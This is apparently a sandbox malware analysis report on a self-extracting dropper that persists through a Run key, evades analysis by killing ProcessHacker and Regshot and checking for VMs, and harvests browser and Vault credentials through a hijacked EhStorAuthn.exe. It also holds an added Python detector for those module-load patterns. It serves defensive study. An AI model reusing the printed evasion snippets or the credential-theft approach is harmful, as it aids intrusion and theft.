            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: fwpuclnt.dllJump to behavior
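The module-load rows above carry the most telling signal in this section: EhStorAuthn.exe, a Microsoft binary that normally handles enhanced-storage authentication, loads winsqlite3.dll, vaultcli.dll and dpapi.dll (browser SQLite stores, Credential Vault, DPAPI decryption), which is what a FormBook payload hollowed into that host needs to harvest credentials, and the dropped file wearing a .icm extension loads wininet.dll like an ordinary downloader. The following script is an added example, not part of the Joe Sandbox report or its tooling: it parses rows in the flattened form this page uses and flags those two patterns. The watchlists of credential-access and network DLLs are heuristic choices of mine, and the sample rows are copied from this report with a benign wscript.exe row as a control.

```python
"""Parse the flattened "Section loaded" rows of a sandbox report and flag
processes whose module loads do not fit their image (added example)."""
import re
from collections import OrderedDict

# Row shape used by this report once the page is flattened: the source path
# runs straight into the "Section loaded:" label and the "Jump to behavior"
# link text trails the DLL name.
ROW_RE = re.compile(
    r"^Source:\s*(?P<path>.+?)Section loaded:\s*(?P<dll>\S+?)(?:Jump to behavior)?\s*$"
)

# Heuristic watchlists (my choice, not part of the report): DLLs a stealer
# needs to read browser SQLite stores, the Credential Vault and DPAPI blobs,
# and DLLs that give an image network access.
CREDENTIAL_DLLS = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}
NETWORK_DLLS = {"wininet.dll", "winhttp.dll", "wsock32.dll", "ws2_32.dll", "mswsock.dll"}
EXECUTABLE_EXTS = (".exe", ".dll", ".com", ".scr")

# Constructed sample: rows copied from this report, with the wscript.exe rows
# and the rmfPfCOHcNt.exe row serving as controls that trip nothing.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: mswsock.dllJump to behavior
"""


def parse_section_loads(text):
    """Return {image path: [dll, ...]} in the order the rows appear."""
    loads = OrderedDict()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            loads.setdefault(m["path"], []).append(m["dll"].lower())
    return loads


def flag_anomalies(loads):
    """Return (image name, reason, sorted dlls) for each suspicious process."""
    findings = []
    for path, dlls in loads.items():
        name = path.rsplit("\\", 1)[-1].lower()
        unique = set(dlls)
        creds = sorted(unique & CREDENTIAL_DLLS)
        # A Microsoft binary under C:\Windows that suddenly needs SQLite, the
        # Vault client and DPAPI is the classic shape of a hollowed host.
        if path.lower().startswith("c:\\windows\\") and creds:
            findings.append((name, "credential-access DLLs loaded by a Windows system binary", creds))
        net = sorted(unique & NETWORK_DLLS)
        # CreateProcess does not care about the extension, so a ".icm" that
        # loads wininet.dll is an executable wearing a disguise.
        if not name.endswith(EXECUTABLE_EXTS) and net:
            findings.append((name, "network DLLs loaded by an image with a non-executable extension", net))
    return findings


if __name__ == "__main__":
    for name, reason, dlls in flag_anomalies(parse_section_loads(SAMPLE_ROWS)):
        print(f"{name}: {reason}: {', '.join(dlls)}")
```

Run against the full row list of a report, the same logic also surfaces the second ipconfig.exe instance and the Program Files drop as separate processes; what it cannot do is tell a hollowed EhStorAuthn.exe from one that was merely injected into, which needs the memory-map evidence in the injection signatures rather than module loads alone.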
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: FS04dlvJrq.exe | Static file information: File size 1336477 > 1048576
Source: FS04dlvJrq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: FS04dlvJrq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: FS04dlvJrq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: FS04dlvJrq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: FS04dlvJrq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: FS04dlvJrq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: FS04dlvJrq.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: FS04dlvJrq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: FS04dlvJrq.exe
Source: Binary string: EhStorAuthn.pdbGCTL | source: RegSvcs.exe, 0000000F.00000002.2646695656.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000002.3356279452.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: rmfPfCOHcNt.exe, 00000015.00000002.3356947382.0000000000BBE000.00000002.00000001.01000000.0000000D.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725761055.0000000000BBE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP | source: RegSvcs.exe, 0000000F.00000002.2646917691.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.00000000045A0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2649299700.00000000043FA000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.000000000473E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2646727901.0000000004249000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2646917691.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000016.00000002.3358640633.00000000045A0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2649299700.00000000043FA000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.000000000473E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2646727901.0000000004249000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: EhStorAuthn.pdb | source: RegSvcs.exe, 0000000F.00000002.2646695656.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000002.3356279452.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
Source: FS04dlvJrq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: FS04dlvJrq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: FS04dlvJrq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: FS04dlvJrq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: FS04dlvJrq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00D65D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 8_2_00D65D78
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4399937
Source: FS04dlvJrq.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E86680 push ecx; ret | 0_2_00E86693
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E85773 push ecx; ret | 0_2_00E85786
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_3_01A34F24 pushad ; ret | 8_3_01A34F41

            Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | File created: C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icm
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | File created: C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icm.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DF25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 8_2_00DF25A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00D7FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 8_2_00D7FC8A
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: bpqdpksed.icm PID: 5156, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep | graph_8-97317
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402219549.0000000001881000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")D
Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402559205.000000000188B000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403420574.000000000188B000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401299815.0000000001889000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")^
Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXESR
Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000846D000.00000004.00000020.00020000.00000000.sdmp, vbepwhj.mp3.8.dr, vbepwhj.mp3.0.dr | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXE]
Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000846D000.00000004.00000020.00020000.00000000.sdmp, vbepwhj.mp3.8.dr, vbepwhj.mp3.0.dr | Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403402785.0000000001882000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402219549.0000000001881000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp, vbepwhj.mp3.8.dr, vbepwhj.mp3.0.dr | Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0142096E rdtsc | 15_2_0142096E
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Window / User API: threadDelayed 2267
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Window / User API: threadDelayed 7706
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | API coverage: 5.3 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | API coverage: 2.7 %
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 3040 | Thread sleep count: 2267 > 30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 3040 | Thread sleep time: -4534000s >= -30000s
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 3040 | Thread sleep count: 7706 > 30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 3040 | Thread sleep time: -15412000s >= -30000s
Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe TID: 6284 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E6F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError | 0_2_00E6F826
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E81630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW | 0_2_00E81630
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E91FF8 FindFirstFileExA | 0_2_00E91FF8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DCE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 8_2_00DCE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DCD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 8_2_00DCD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DCDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 8_2_00DCDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 8_2_00DD9F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DDA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 8_2_00DDA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DDA488 FindFirstFileW,Sleep,FindNextFileW,FindClose | 8_2_00DDA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DD65F1 FindFirstFileW,FindNextFileW,FindClose | 8_2_00DD65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00D9C642 FindFirstFileExW | 8_2_00D9C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 8_2_00DD72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DD7248 FindFirstFileW,FindClose | 8_2_00DD7248
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Code function: 22_2_022FC200 FindFirstFileW,FindNextFileW,FindClose | 22_2_022FC200
Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E84E14 VirtualQuery,GetSystemInfo | 0_2_00E84E14
Source: 7kHDEL15.22.dr | Binary or memory string: discord.comVMware20,11696487552f
Source: vbepwhj.mp3.0.dr | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: 7kHDEL15.22.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 7kHDEL15.22.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 7kHDEL15.22.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 7kHDEL15.22.dr | Binary or memory string: global block list test formVMware20,11696487552
Source: 7kHDEL15.22.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: EhStorAuthn.exe, 00000016.00000002.3361591010.00000000076F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: COM.HKVMware20,jYt
Source: 7kHDEL15.22.dr | Binary or memory string: AMC password management pageVMware20,11696487552
Source: 7kHDEL15.22.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 7kHDEL15.22.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 7kHDEL15.22.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: 7kHDEL15.22.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: firefox.exe, 00000018.00000002.2995829898.000001CA59C9C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: 7kHDEL15.22.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: vbepwhj.mp3.0.dr | Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: 7kHDEL15.22.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: bpqdpksed.icm, 00000008.00000003.2402044171.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401355186.00000000018C3000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402065265.00000000018D2000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401211605.00000000018BC000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401579053.00000000018C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxTray.exeOS
